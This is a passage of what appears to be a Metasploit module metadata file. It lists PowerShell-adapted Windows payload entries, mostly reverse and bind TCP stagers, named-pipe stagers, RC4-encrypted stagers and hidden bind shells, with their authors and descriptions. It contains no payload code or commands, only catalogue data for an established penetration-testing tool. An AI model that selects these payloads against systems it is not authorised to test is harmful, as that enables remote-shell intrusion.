"cmd/windows/powershell/patchupmeterpreter/reverse_tcp_dns", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/patchupmeterpreter/reverse_tcp_dns", - "staged": true, - "stage_refname": "windows/patchupmeterpreter", - "stager_refname": "windows/reverse_tcp_dns" - }, - 
"payload_cmd/windows/powershell/patchupmeterpreter/reverse_tcp_rc4": { - "name": "Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/powershell/patchupmeterpreter/reverse_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "jt ", - "hdm ", - "sf ", - "mihi", - "RageLtMan" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/patchupmeterpreter/reverse_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/patchupmeterpreter/reverse_tcp_rc4", - "staged": true, - "stage_refname": "windows/patchupmeterpreter", - "stager_refname": "windows/reverse_tcp_rc4" - }, - "payload_cmd/windows/powershell/patchupmeterpreter/reverse_tcp_rc4_dns": { - "name": "Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", - "fullname": "payload/cmd/windows/powershell/patchupmeterpreter/reverse_tcp_rc4_dns", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "jt ", - "hdm ", - "sf ", - "mihi", - "RageLtMan" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": 
"2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/patchupmeterpreter/reverse_tcp_rc4_dns", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/patchupmeterpreter/reverse_tcp_rc4_dns", - "staged": true, - "stage_refname": "windows/patchupmeterpreter", - "stager_refname": "windows/reverse_tcp_rc4_dns" - }, - "payload_cmd/windows/powershell/patchupmeterpreter/reverse_tcp_uuid": { - "name": "Powershell Exec, Reverse TCP Stager with UUID Support", - "fullname": "payload/cmd/windows/powershell/patchupmeterpreter/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "jt ", - "hdm ", - "OJ Reeves" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker with UUID Support", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/patchupmeterpreter/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/patchupmeterpreter/reverse_tcp_uuid", - "staged": true, - "stage_refname": "windows/patchupmeterpreter", - "stager_refname": "windows/reverse_tcp_uuid" - }, - "payload_cmd/windows/powershell/peinject/bind_hidden_ipknock_tcp": { - "name": "Powershell Exec, Hidden Bind Ipknock TCP 
Stager", - "fullname": "payload/cmd/windows/powershell/peinject/bind_hidden_ipknock_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "ege ", - "hdm ", - "skape ", - "sf ", - "Borja Merino " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode", - "references": [ - "URL-https://github.com/EgeBalci/Amber", - "URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/peinject/bind_hidden_ipknock_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/peinject/bind_hidden_ipknock_tcp", - "staged": true, - "stage_refname": "windows/peinject", - "stager_refname": "windows/bind_hidden_ipknock_tcp" - }, - "payload_cmd/windows/powershell/peinject/bind_hidden_tcp": { - "name": "Powershell Exec, Hidden Bind TCP Stager", - "fullname": "payload/cmd/windows/powershell/peinject/bind_hidden_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "ege ", - "hdm ", - "skape ", - "sf ", - "Borja Merino " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a 
connection from a hidden port and spawn a command shell to the allowed host.", - "references": [ - "URL-https://github.com/EgeBalci/Amber", - "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/peinject/bind_hidden_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/peinject/bind_hidden_tcp", - "staged": true, - "stage_refname": "windows/peinject", - "stager_refname": "windows/bind_hidden_tcp" - }, - "payload_cmd/windows/powershell/peinject/bind_ipv6_tcp": { - "name": "Powershell Exec, Bind IPv6 TCP Stager (Windows x86)", - "fullname": "payload/cmd/windows/powershell/peinject/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "ege ", - "hdm ", - "skape ", - "sf " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for an IPv6 connection (Windows x86)", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/peinject/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - 
"adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/peinject/bind_ipv6_tcp", - "staged": true, - "stage_refname": "windows/peinject", - "stager_refname": "windows/bind_ipv6_tcp" - }, - "payload_cmd/windows/powershell/peinject/bind_ipv6_tcp_uuid": { - "name": "Powershell Exec, Bind IPv6 TCP Stager with UUID Support (Windows x86)", - "fullname": "payload/cmd/windows/powershell/peinject/bind_ipv6_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "ege ", - "hdm ", - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for an IPv6 connection with UUID Support (Windows x86)", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/peinject/bind_ipv6_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/peinject/bind_ipv6_tcp_uuid", - "staged": true, - "stage_refname": "windows/peinject", - "stager_refname": "windows/bind_ipv6_tcp_uuid" - }, - "payload_cmd/windows/powershell/peinject/bind_named_pipe": { - "name": "Powershell Exec, Windows x86 Bind Named Pipe Stager", - "fullname": "payload/cmd/windows/powershell/peinject/bind_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "ege ", - "UserExistsError" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a pipe connection (Windows 
x86)", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/peinject/bind_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/peinject/bind_named_pipe", - "staged": true, - "stage_refname": "windows/peinject", - "stager_refname": "windows/bind_named_pipe" - }, - "payload_cmd/windows/powershell/peinject/bind_nonx_tcp": { - "name": "Powershell Exec, Bind TCP Stager (No NX or Win7)", - "fullname": "payload/cmd/windows/powershell/peinject/bind_nonx_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "ege ", - "vlad902 " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection (No NX)", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/peinject/bind_nonx_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/peinject/bind_nonx_tcp", - "staged": true, - "stage_refname": "windows/peinject", - "stager_refname": "windows/bind_nonx_tcp" - }, - 
"payload_cmd/windows/powershell/peinject/bind_tcp": { - "name": "Powershell Exec, Bind TCP Stager (Windows x86)", - "fullname": "payload/cmd/windows/powershell/peinject/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "ege ", - "hdm ", - "skape ", - "sf " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection (Windows x86)", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/peinject/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/peinject/bind_tcp", - "staged": true, - "stage_refname": "windows/peinject", - "stager_refname": "windows/bind_tcp" - }, - "payload_cmd/windows/powershell/peinject/bind_tcp_rc4": { - "name": "Powershell Exec, Bind TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/powershell/peinject/bind_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "ege ", - "hdm ", - "skape ", - "sf ", - "mihi", - "RageLtMan" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": 
"/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/peinject/bind_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/peinject/bind_tcp_rc4", - "staged": true, - "stage_refname": "windows/peinject", - "stager_refname": "windows/bind_tcp_rc4" - }, - "payload_cmd/windows/powershell/peinject/bind_tcp_uuid": { - "name": "Powershell Exec, Bind TCP Stager with UUID Support (Windows x86)", - "fullname": "payload/cmd/windows/powershell/peinject/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "ege ", - "hdm ", - "OJ Reeves" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection with UUID Support (Windows x86)", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/peinject/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/peinject/bind_tcp_uuid", - "staged": true, - "stage_refname": "windows/peinject", - "stager_refname": "windows/bind_tcp_uuid" - }, - "payload_cmd/windows/powershell/peinject/find_tag": { - "name": "Powershell Exec, Find Tag Ordinal Stager", - "fullname": "payload/cmd/windows/powershell/peinject/find_tag", - "aliases": [], - "rank": 300, - 
"disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "ege ", - "skape " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nUse an established connection", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/peinject/find_tag", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/peinject/find_tag", - "staged": true, - "stage_refname": "windows/peinject", - "stager_refname": "windows/findtag_ord" - }, - "payload_cmd/windows/powershell/peinject/reverse_ipv6_tcp": { - "name": "Powershell Exec, Reverse TCP Stager (IPv6)", - "fullname": "payload/cmd/windows/powershell/peinject/reverse_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "ege ", - "hdm ", - "skape ", - "sf " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker over IPv6", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/peinject/reverse_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - 
"payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/peinject/reverse_ipv6_tcp", - "staged": true, - "stage_refname": "windows/peinject", - "stager_refname": "windows/reverse_ipv6_tcp" - }, - "payload_cmd/windows/powershell/peinject/reverse_named_pipe": { - "name": "Powershell Exec, Windows x86 Reverse Named Pipe (SMB) Stager", - "fullname": "payload/cmd/windows/powershell/peinject/reverse_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "ege ", - "OJ Reeves" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker via a named pipe pivot", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/peinject/reverse_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/peinject/reverse_named_pipe", - "staged": true, - "stage_refname": "windows/peinject", - "stager_refname": "windows/reverse_named_pipe" - }, - "payload_cmd/windows/powershell/peinject/reverse_nonx_tcp": { - "name": "Powershell Exec, Reverse TCP Stager (No NX or Win7)", - "fullname": "payload/cmd/windows/powershell/peinject/reverse_nonx_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "ege ", - "vlad902 " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker (No NX)", - "references": [ - 
"URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/peinject/reverse_nonx_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/peinject/reverse_nonx_tcp", - "staged": true, - "stage_refname": "windows/peinject", - "stager_refname": "windows/reverse_nonx_tcp" - }, - "payload_cmd/windows/powershell/peinject/reverse_ord_tcp": { - "name": "Powershell Exec, Reverse Ordinal TCP Stager (No NX or Win7)", - "fullname": "payload/cmd/windows/powershell/peinject/reverse_ord_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "ege ", - "spoonm " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/peinject/reverse_ord_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/peinject/reverse_ord_tcp", - "staged": true, - "stage_refname": "windows/peinject", - "stager_refname": "windows/reverse_ord_tcp" - }, - 
"payload_cmd/windows/powershell/peinject/reverse_tcp": { - "name": "Powershell Exec, Reverse TCP Stager", - "fullname": "payload/cmd/windows/powershell/peinject/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "ege ", - "hdm ", - "skape ", - "sf " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/peinject/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/peinject/reverse_tcp", - "staged": true, - "stage_refname": "windows/peinject", - "stager_refname": "windows/reverse_tcp" - }, - "payload_cmd/windows/powershell/peinject/reverse_tcp_allports": { - "name": "Powershell Exec, Reverse All-Port TCP Stager", - "fullname": "payload/cmd/windows/powershell/peinject/reverse_tcp_allports", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "ege ", - "hdm ", - "skape ", - "sf " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": 
"/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/peinject/reverse_tcp_allports", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/peinject/reverse_tcp_allports", - "staged": true, - "stage_refname": "windows/peinject", - "stager_refname": "windows/reverse_tcp_allports" - }, - "payload_cmd/windows/powershell/peinject/reverse_tcp_dns": { - "name": "Powershell Exec, Reverse TCP Stager (DNS)", - "fullname": "payload/cmd/windows/powershell/peinject/reverse_tcp_dns", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "ege ", - "hdm ", - "skape ", - "sf ", - "RageLtMan" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/peinject/reverse_tcp_dns", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/peinject/reverse_tcp_dns", - "staged": true, - "stage_refname": "windows/peinject", - "stager_refname": "windows/reverse_tcp_dns" - }, - "payload_cmd/windows/powershell/peinject/reverse_tcp_rc4": { - "name": "Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/powershell/peinject/reverse_tcp_rc4", - 
"aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "ege ", - "hdm ", - "skape ", - "sf ", - "mihi", - "RageLtMan" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/peinject/reverse_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/peinject/reverse_tcp_rc4", - "staged": true, - "stage_refname": "windows/peinject", - "stager_refname": "windows/reverse_tcp_rc4" - }, - "payload_cmd/windows/powershell/peinject/reverse_tcp_rc4_dns": { - "name": "Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", - "fullname": "payload/cmd/windows/powershell/peinject/reverse_tcp_rc4_dns", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "ege ", - "hdm ", - "skape ", - "sf ", - "mihi", - "RageLtMan" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/peinject/reverse_tcp_rc4_dns", - 
"check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/peinject/reverse_tcp_rc4_dns", - "staged": true, - "stage_refname": "windows/peinject", - "stager_refname": "windows/reverse_tcp_rc4_dns" - }, - "payload_cmd/windows/powershell/peinject/reverse_tcp_uuid": { - "name": "Powershell Exec, Reverse TCP Stager with UUID Support", - "fullname": "payload/cmd/windows/powershell/peinject/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "ege ", - "hdm ", - "OJ Reeves" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker with UUID Support", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/peinject/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/peinject/reverse_tcp_uuid", - "staged": true, - "stage_refname": "windows/peinject", - "stager_refname": "windows/reverse_tcp_uuid" - }, - "payload_cmd/windows/powershell/pingback_bind_tcp": { - "name": "Powershell Exec, Windows x86 Pingback, Bind TCP Inline", - "fullname": "payload/cmd/windows/powershell/pingback_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7" - ], - "description": "Execute an x86 
payload from a command via PowerShell.\n\nOpen a socket and report UUID when a connection is received (Windows x86)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/pingback_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/pingback_bind_tcp", - "staged": false - }, - "payload_cmd/windows/powershell/pingback_reverse_tcp": { - "name": "Powershell Exec, Windows x86 Pingback, Reverse TCP Inline", - "fullname": "payload/cmd/windows/powershell/pingback_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to attacker and report UUID (Windows x86)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/pingback_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/pingback_reverse_tcp", - "staged": false - }, - "payload_cmd/windows/powershell/powershell_bind_tcp": { - "name": "Powershell Exec", - "fullname": 
